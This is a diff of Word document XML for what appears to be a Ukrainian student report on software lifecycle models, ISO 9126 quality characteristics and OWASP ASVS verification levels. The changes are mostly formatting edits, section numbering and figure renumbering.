+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Та поради щодо способів виправлення вихідного код</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>у з метою виправити вразливість:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E69E524" wp14:editId="647F1360">
+            <wp:extent cx="5940425" cy="7144573"/>
+            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
+            <wp:docPr id="17" name="Рисунок 17"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId23"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
                       <a:ext cx="5940425" cy="7144573"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
@@ -30265,7 +30814,20 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve"> є можливість створювати звіт по результатам тестування.</w:t>
+        <w:t xml:space="preserve"> є можливість створю</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>вати звіт по результатам тестування.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -30326,7 +30888,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId23"/>
+                    <a:blip r:embed="rId24"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -32285,7 +32847,6 @@
   <w:style w:type="character" w:default="1" w:styleId="a0">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="a1">
@@ -32665,7 +33226,6 @@
   <w:style w:type="character" w:default="1" w:styleId="a0">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="a1">
@@ -33152,7 +33712,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{084E5DCB-7262-45B8-8DAE-B6938E67D7FA}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{08F51E6D-3A59-460F-846D-6FB484A05547}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Bullshit.docx
+++ b/Bullshit.docx
@@ -321,6 +321,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -347,12 +348,13 @@
             <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
             <o:lock v:ext="edit" aspectratio="t"/>
           </v:shapetype>
-          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:468pt;height:378.75pt">
+          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:468pt;height:378.75pt">
             <v:imagedata r:id="rId7" o:title="Waterfall"/>
           </v:shape>
         </w:pict>
       </w:r>
     </w:p>
+    <w:bookmarkEnd w:id="0"/>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
@@ -477,7 +479,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>ілки, в результаті чого вийшов графік стандартного життєвого індустріального циклу, показаний на рис. 1.2.</w:t>
+        <w:t xml:space="preserve">ілки, в результаті чого вийшов графік </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>стандартного</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> життєвого індустріального циклу, показаний на рис. 1.2.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -508,7 +528,7 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:pict>
-          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:468pt;height:378.75pt">
+          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:468pt;height:378.75pt">
             <v:imagedata r:id="rId8" o:title="Waterfall main"/>
           </v:shape>
         </w:pict>
@@ -578,17 +598,16 @@
           <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Короткий</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1.1.1 </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -596,7 +615,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> опис фаз каскадної моделі</w:t>
+        <w:t>Короткий опис фаз каскадної моделі</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1225,6 +1244,16 @@
           <w:b/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1.1.2 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>Переваги каскадної моделі</w:t>
       </w:r>
@@ -2012,6 +2041,16 @@
           <w:b/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1.1.3 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>Недоліки каскадної</w:t>
       </w:r>
@@ -2605,6 +2644,15 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:t xml:space="preserve">1.2 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>V-</w:t>
       </w:r>
       <w:r>
@@ -3001,7 +3049,7 @@
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
         <w:pict>
-          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:438pt;height:270pt">
+          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:438pt;height:270pt">
             <v:imagedata r:id="rId9" o:title="V-model"/>
           </v:shape>
         </w:pict>
@@ -3032,9 +3080,9 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>X</w:t>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>3</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3104,6 +3152,16 @@
           <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1.2.1 </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3464,6 +3522,16 @@
           <w:b/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1.2.2 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
         <w:t>Переваги V-подібної моделі</w:t>
@@ -3726,6 +3794,16 @@
           <w:b/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1.2.3 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
         <w:t>Недоліки V-подібної моделі</w:t>
@@ -4286,7 +4364,7 @@
         <w:pStyle w:val="a3"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
-          <w:numId w:val="1"/>
+          <w:numId w:val="15"/>
         </w:numPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="center"/>
@@ -4370,10 +4448,11 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
         </w:rPr>
-        <w:t>ISO 9126[1]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+        <w:t>ISO 9126</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
@@ -4617,7 +4696,16 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>Рисунок 1.1</w:t>
+        <w:t>Рисунок 1.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>4</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4704,7 +4792,25 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve">використовує для опису внутрішньої та зовнішньої якості ПЗ багаторівневу модель. На верхньому рівні виділено 6 основних характеристик якості ПЗ. Кожна характеристика описана за допомогою атрибутів, що до неї входять. У кожного атрибута є набір метрик, що дозволяє оцінити цей атрибут. На Рис. 1.2 наведено набір характеристик та атрибутів , визначених в </w:t>
+        <w:t>використовує для опису внутрішньої та зовнішньої якості ПЗ багаторівневу модель. На верхньому рівні виділено 6 основних характеристик якості ПЗ. Кожна характеристика описана за допомогою атрибутів, що до неї входять. У кожного атрибута є набір метрик, що дозволяє оцінити цей атрибут. На Рис</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>унку 1.5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> наведено набір характеристик та атрибутів , визначених в </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4737,14 +4843,18 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:noProof/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E4EA28B" wp14:editId="49BE5E60">
-            <wp:extent cx="3514725" cy="3232140"/>
-            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
-            <wp:docPr id="6" name="Рисунок 6"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5934075" cy="4981575"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+            <wp:docPr id="1" name="Рисунок 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -4752,23 +4862,36 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="0" name=""/>
-                    <pic:cNvPicPr/>
+                    <pic:cNvPr id="0" name="Picture 4"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11"/>
+                    <a:blip r:embed="rId11">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
                   </pic:blipFill>
-                  <pic:spPr>
+                  <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="3517817" cy="3234984"/>
+                      <a:ext cx="5934075" cy="4981575"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -4794,8 +4917,16 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Рисунок 1.2. </w:t>
+        <w:t>Рисунок 1.5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5042,6 +5173,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve"> Відповідність стандартам і правилам (compliance). Відповідність ПО наявними індустріальним стандартам, нормативним і законодавчим актам, іншим регулюючим нормам.</w:t>
       </w:r>
     </w:p>
@@ -5266,7 +5398,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Зручність використання (usability) або практичність. Здатність ПЗ бути зручним в навчанні і використанні, а також привабливим для користувачів.</w:t>
       </w:r>
     </w:p>
@@ -5377,6 +5508,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Відповідність стандартам зручності використання (usability compliance).</w:t>
       </w:r>
     </w:p>
@@ -5552,7 +5684,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>З</w:t>
       </w:r>
       <w:r>
@@ -5731,6 +5862,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Адаптованість</w:t>
       </w:r>
       <w:r>
@@ -5877,19 +6009,20 @@
         <w:pStyle w:val="a3"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
-          <w:numId w:val="1"/>
+          <w:numId w:val="15"/>
         </w:numPr>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
@@ -5899,6 +6032,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="en-US"/>
@@ -5908,6 +6042,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -6064,7 +6199,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:br/>
       </w:r>
       <w:proofErr w:type="gramStart"/>
@@ -6231,6 +6365,7 @@
           <w:noProof/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4502638" cy="3101630"/>
@@ -6308,9 +6443,9 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>x</w:t>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>1</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6326,9 +6461,9 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>x</w:t>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>6</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6475,19 +6610,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve">Рівень 1 зазвичай підходить для додатків, де потрібна низька впевненість у </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">правильному використанні засобів контролю безпеки або для швидкого аналізу парку корпоративних додатків або сприяння в розробці пріоритетного списку вимог безпеки в рамках багатофазного зусилля. </w:t>
+        <w:t xml:space="preserve">Рівень 1 зазвичай підходить для додатків, де потрібна низька впевненість у правильному використанні засобів контролю безпеки або для швидкого аналізу парку корпоративних додатків або сприяння в розробці пріоритетного списку вимог безпеки в рамках багатофазного зусилля. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6945,7 +7068,18 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">Рівень 2 забезпечує контроль безпеки на місці, ефективний і використовується в додатку. </w:t>
+        <w:t xml:space="preserve">Рівень 2 забезпечує контроль безпеки на місці, ефективний і використовується в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">додатку. </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -7191,7 +7325,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Застосування</w:t>
       </w:r>
       <w:r>
@@ -7365,51 +7498,9 @@
           <w:color w:val="212121"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>V</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">1. </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>Арх</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>ітектура, проектування та моделювання загроз</w:t>
-      </w:r>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7447,9 +7538,9 @@
           <w:color w:val="212121"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>Переконайтеся в тому, що перевірений додаток задовольняє н</w:t>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>V</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7457,9 +7548,31 @@
           <w:color w:val="212121"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>аступні вимоги високого рівня:</w:t>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Арх</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>ітектура, проектування та моделювання загроз</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7489,7 +7602,7 @@
           <w:color w:val="212121"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="ru-RU"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -7500,7 +7613,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>+ На рівні 1, компоненти програми визначені</w:t>
+        <w:t>Переконайтеся в тому, що перевірений додаток задовольняє н</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7510,7 +7623,27 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
